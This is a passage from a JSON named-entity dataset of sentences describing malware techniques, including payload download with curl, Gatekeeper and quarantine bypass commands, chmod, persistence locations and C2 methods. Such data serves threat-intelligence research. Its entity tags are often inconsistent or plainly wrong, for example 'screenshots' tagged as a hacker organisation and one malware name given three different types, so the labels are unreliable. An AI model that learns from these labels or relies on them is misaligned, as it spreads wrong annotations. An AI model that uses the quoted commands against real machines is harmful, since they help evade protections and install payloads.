"O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "will", "reboot", "the", "system", "one", "hour", "after", "infection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NotPetya", "can", "use", "<code>wmic</code>", "to", "help", "propagate", "itself", "across", "a", "network." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OLDBAIT", "collects", "credentials", "from", "several", "email", "clients." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OLDBAIT", "collects", "credentials", "from", "Internet", "Explorer,", "Mozilla", "Firefox,", "and", "Eudora." ], "ner_tags": [ "B-Idus", "I-Features", "I-Features", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "OLDBAIT", "can", "use", "SMTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "OLDBAIT", "installs", "itself", "in", "<code>%ALLUSERPROFILE%\\\\Application", "Data\\Microsoft\\MediaPlayer\\updatewindws.exe</code>;", "the", "directory", "name", "is", "missing", "a", "space", "and", "the", "file", "name", "is", "missing", "the", "letter", "\"o.\"" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OLDBAIT", "obfuscates", "internal", "strings", "and", "unpacks", "them", "at", "startup." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OLDBAIT", "can", "use", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "OSInfo", "enumerates", "local", "and", "domain", "users" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "specifically", "looks", "for", "Domain", "Admins", "and", "power", "users", "within", "the", "domain." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-Purp", "O", "B-Purp", "B-Org", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "enumerates", "local", "and", "domain", "users" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "has", "enumerated", "the", "local", "administrators", "group." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "discovers", "shares", "on", "the", "network" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "queries", "the", "registry", "to", "look", "for", "information", "about", "Terminal", "Services." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "performs", "a", "connection", "test", "to", "discover", "remote", "systems", "in", "the", "network" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "discovers", "information", "about", "the", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "discovers", "the", "current", "domain", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSInfo", "enumerates", "the", "current", "network", "connections", "similar", "to", "<code>", "net", "use", "</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "install", "malicious", "Safari", "browser", "extensions", "to", "serve", "ads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "base64-decode", "and", "AES-decrypt", "downloaded", "payloads.", "Versions", "of", "OSX/Shlayer", "pass", "encrypted", "and", "password-protected", "code", "to", "<code>openssl</code>", "and", "then", "write", "the", "payload", "to", "the", "<code>/tmp</code>", "folder." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "escalate", "privileges", "to", "root", "by", "asking", "the", "user", "for", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "used", "the", "command", "<code>appDir=\"$(dirname", "$(dirname", "\"$currentDir\"))\"</code>", "and", "<code>$(dirname", "\"$(pwd", "-P)\")</code>", "to", "construct", "installation", "paths." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "If", "running", "with", "elevated", "privileges,", "OSX/Shlayer", "has", "used", "the", "<code>spctl</code>", "command", "to", "disable", "Gatekeeper", "protection", "for", "a", "downloaded", "file.", "OSX/Shlayer", "can", "also", "leverage", "system", "links", "pointing", "to", "bash", "scripts", "in", "the", "downloaded", "DMG", "file", "to", "bypass", "Gatekeeper,", "a", "flaw", "patched", "in", "macOS", "11.3", "and", "later", "versions.", "OSX/Shlayer", "has", "been", "Notarized", "by", "Apple,", "resulting", "in", "successful", "passing", "of", "additional", "Gatekeeper", "checks." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "executed", "a", ".command", "script", "from", "a", "hidden", "directory", "in", "a", "mounted", "DMG." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "used", "the", "<code>mktemp</code>", "utility", "to", "make", "random", "and", "unique", "filenames", "for", "payloads,", "such", "as", "<code>export", "tmpDir=\"$(mktemp", "-d", "/tmp/XXXXXXXXXXXX)\"</code>", "or", "<code>mktemp", "-t", "Installer</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "used", "the", "`nohup`", "command", "to", "instruct", "executed", "payloads", "to", "ignore", "hangup", "signals." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "download", "payloads,", "and", "extract", "bytes", "from", "files.", "OSX/Shlayer", "uses", "the", "<code>curl", "-fsL", "\"$url\"", ">$tmp_path</code>", "command", "to", "download", "malicious", "payloads", "into", "a", "temporary", "directory." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "I-Features", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "use", "the", "<code>chmod</code>", "utility", "to", "set", "a", "file", "as", "executable,", "such", "as", "<code>chmod", "777</code>", "or", "<code>chmod", "+x</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "relied", "on", "users", "mounting", "and", "executing", "a", "malicious", "DMG", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "masquerade", "as", "a", "Flash", "Player", "update." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "used", "a", "resource", "fork", "to", "hide", "a", "compressed", "binary", "file", "of", "itself", "from", "the", "terminal,", "Finder,", "and", "potentially", "evade", "traditional", "scanners." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX/Shlayer", "has", "collected", "the", "IOPlatformUUID,", "session", "UID,", "and", "the", "OS", "version", "using", "the", "command", "<code>sw_vers", "-productVersion</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "OSX/Shlayer", "can", "use", "bash", "scripts", "to", "check", "the", "macOS", "version,", "download", "payloads,", "and", "extract", "bytes", "from", "files.", "OSX/Shlayer", "uses", "the", "command", "<code>sh", "-c", "tail", "-c", "+1381...</code>", "to", "extract", "bytes", "at", "an", "offset", "from", "a", "specified", "file.", "OSX/Shlayer", "uses", "the", "<code>curl", "-fsL", "\"$url\"", ">$tmp_path</code>", "command", "to", "download", "malicious", "payloads", "into", "a", "temporary", "directory." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "B-Way", "B-SamFile", "B-SamFile", "O", "O", "I-Features", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "used", "AES", "in", "CBC", "mode", "to", "encrypt", "collected", "data", "when", "saving", "that", "data", "to", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "scrambles", "and", "encrypts", "data", "using", "AES256", "before", "sending", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "the", "ability", "to", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "uses", "a", "decode", "routine", "combining", "bit", "shifting", "and", "XOR", "operations", "with", "a", "variable", "key", "that", "depends", "on", "the", "length", "of", "the", "string", "that", "was", "encoded.", "If", "the", "computation", "for", "the", "variable", "XOR", "key", "turns", "out", "to", "be", "0,", "the", "default", "XOR", "key", "of", "0x1B", "is", "used.", "This", "routine", "is", "also", "referenced", "as", "the", "`rotate`", "function", "in", "reporting." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "encrypts", "its", "strings", "in", "RSA256", "and", "encodes", "them", "in", "a", "custom", "base64", "scheme", "and", "XOR." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "a", "command", "to", "delete", "a", "file", "from", "the", "system.", "OSX_OCEANLOTUS.D", "deletes", "the", "app", "bundle", "and", "dropper", "after", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "uses", "the", "command", "<code>xattr", "-d", "com.apple.quarantine</code>", "to", "remove", "the", "quarantine", "file", "attribute", "used", "by", "Gatekeeper." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "sets", "the", "main", "loader", "file’s", "attributes", "to", "hidden." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "a", "command", "to", "download", "and", "execute", "a", "file", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "can", "create", "a", "persistence", "file", "in", "the", "folder", "<code>/Library/LaunchAgents</code>." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "If", "running", "with", "<code>root</code>", "permissions,", "OSX_OCEANLOTUS.D", "can", "create", "a", "persistence", "file", "in", "the", "folder", "<code>/Library/LaunchDaemons</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "changed", "permissions", "of", "a", "second-stage", "payload", "to", "an", "executable", "via", "<code>chmod</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "disguised", "it's", "true", "file", "structure", "as", "an", "application", "bundle", "by", "adding", "special", "characters", "to", "the", "filename", "and", "using", "the", "icon", "for", "legitimate", "Word", "documents." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "uses", "file", "naming", "conventions", "with", "associated", "executable", "locations", "to", "blend", "in", "with", "the", "macOS", "TimeMachine", "and", "OpenSSL", "services.", "Such", "as,", "naming", "a", "LaunchAgent", "plist", "file", "`com.apple.openssl.plist`", "which", "executes", "OSX_OCEANLOTUS.D", "from", "the", "user's", "`~/Library/OpenSSL/`", "folder", "upon", "user", "login." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-HackOrg", "B-Features", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "used", "a", "custom", "binary", "protocol", "over", "port", "443", "for", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "used", "a", "custom", "binary", "protocol", "over", "TCP", "port", "443", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "uses", "PowerShell", "scripts." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "For", "network", "communications,", "OSX_OCEANLOTUS.D", "loads", "a", "dynamic", "library", "(`.dylib`", "file)", "using", "`dlopen()`", "and", "obtains", "a", "function", "pointer", "to", "execute", "within", "that", "shared", "library", "using", "`dlsym()`." ], "ner_tags": [ "O", "I-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "a", "variant", "that", "is", "packed", "with", "UPX." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "has", "used", "`zlib`", "to", "compress", "all", "data", "after", "0x52", "for", "the", "custom", "TCP", "C2", "protocol." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "encrypts", "data", "sent", "back", "to", "the", "C2", "using", "AES", "in", "CBC", "mode", "with", "a", "null", "initialization", "vector", "(IV)", "and", "a", "key", "sent", "from", "the", "server", "that", "is", "padded", "to", "32", "bytes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "checks", "a", "number", "of", "system", "parameters", "to", "see", "if", "it", "is", "being", "run", "on", "real", "hardware", "or", "in", "a", "virtual", "machine", "environment,", "such", "as", "`sysctl", "hw.model`", "and", "the", "kernel", "boot", "time." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "collects", "processor", "information,", "memory", "information,", "computer", "name,", "hardware", "UUID,", "serial", "number,", "and", "operating", "system", "version.", "OSX_OCEANLOTUS.D", "has", "used", "the", "<code>ioreg</code>", "command", "to", "gather", "some", "of", "this", "information." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "can", "collect", "the", "network", "interface", "MAC", "address", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "can", "use", "the", "<code>touch", "-t</code>", "command", "to", "change", "timestamps." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "uses", "a", "shell", "script", "as", "the", "main", "executable", "inside", "an", "app", "bundle", "and", "drops", "an", "embedded", "base64-encoded", "payload", "to", "the", "<code>/tmp</code>", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "uses", "Word", "macros", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "OSX_OCEANLOTUS.D", "can", "also", "use", "use", "HTTP", "POST", "and", "GET", "requests", "to", "send", "and", "receive", "C2", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "break", "large", "files", "of", "interest", "into", "smaller", "chunks", "to", "prepare", "them", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "has", "the", "ability", "to", "extract", "data", "from", "removable", "devices", "connected", "to", "the", "endpoint." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "has", "the", "ability", "to", "recursively", "enumerate", "files", "on", "an", "infected", "endpoint." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "copy", "specific", "files,", "webcam", "captures,", "and", "screenshots", "to", "local", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "has", "gained", "execution", "on", "targeted", "systems", "through", "luring", "users", "to", "click", "on", "links", "to", "malicious", "URLs." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "discover", "pluggable/removable", "drives", "to", "extract", "files", "from." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "check", "for", "blocklisted", "process", "names", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "gain", "persistence", "by", "a", "creating", "a", "shortcut", "in", "the", "infected", "user's", "Startup", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "capture", "a", "screenshot", "of", "the", "current", "screen." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "hide", "its", "payload", "in", "BMP", "images", "hosted", "on", "compromised", "websites." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "halt", "execution", "if", "it", "identifies", "processes", "belonging", "to", "virtual", "machine", "software", "or", "analysis", "tools." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "has", "the", "ability", "to", "check", "for", "blocklisted", "computer", "names", "on", "infected", "endpoints." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "check", "for", "blocklisted", "usernames", "on", "infected", "endpoints." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ObliqueRAT", "can", "capture", "images", "from", "webcams", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "delete", "files", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "extract", "drive", "information", "from", "the", "endpoint", "and", "search", "files", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "encode", "data", "with", "a", "NOT", "operation", "before", "sending", "the", "data", "to", "the", "control", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "collect", "the", "name", "and", "ID", "for", "every", "process", "running", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "has", "been", "delivered", "via", "spearphishing", "emails", "with", "Microsoft", "Office", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "collect", "the", "computer", "name", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "collect", "the", "victim’s", "IP", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OceanSalt", "can", "create", "a", "reverse", "shell", "on", "the", "infected", "endpoint", "using", "cmd.exe.", "OceanSalt", "has", "been", "executed", "via", "malicious", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "compressed", "data", "before", "exfiltrating", "it", "using", "a", "tool", "called", "Abbrevia." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Octopus", "can", "exfiltrate", "files", "from", "the", "system", "using", "a", "documents", "collector", "tool." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Octopus", "has", "uploaded", "stolen", "files", "and", "data", "from", "a", "victim's", "machine", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "exfiltrated", "data", "to", "file", "sharing", "sites." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "can", "collect", "information", "on", "the", "Windows", "directory", "and", "searches", "for", "compressed", "RAR", "files", "on", "the", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "can", "download", "additional", "files", "and", "tools", "onto", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "stored", "collected", "information", "in", "the", "Application", "Data", "directory", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Octopus", "has", "been", "disguised", "as", "legitimate", "programs,", "such", "as", "Java", "and", "Telegram", "Messenger." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "B-Tool" ] }, { "tokens": [ "Octopus", "achieved", "persistence", "by", "placing", "a", "malicious", "executable", "in", "the", "startup", "directory", "and", "has", "added", "the", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "key", "to", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "can", "capture", "screenshots", "of", "the", "victims’", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "been", "delivered", "via", "spearsphishing", "emails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Octopus", "has", "encoded", "C2", "communications", "in", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "can", "collect", "system", "drive", "information,", "the", "computer", "name,", "the", "size", "of", "the", "disk,", "OS", "version,", "and", "OS", "architecture", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "can", "collect", "the", "host", "IP", "address", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "can", "collect", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "used", "HTTP", "GET", "and", "POST", "requests", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Octopus", "has", "used", "wmic.exe", "for", "local", "discovery", "information." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "has", "used", "a", "custom", "implementation", "of", "AES", "encryption", "to", "encrypt", "collected", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "was", "seen", "using", "a", "RAR", "archiver", "tool", 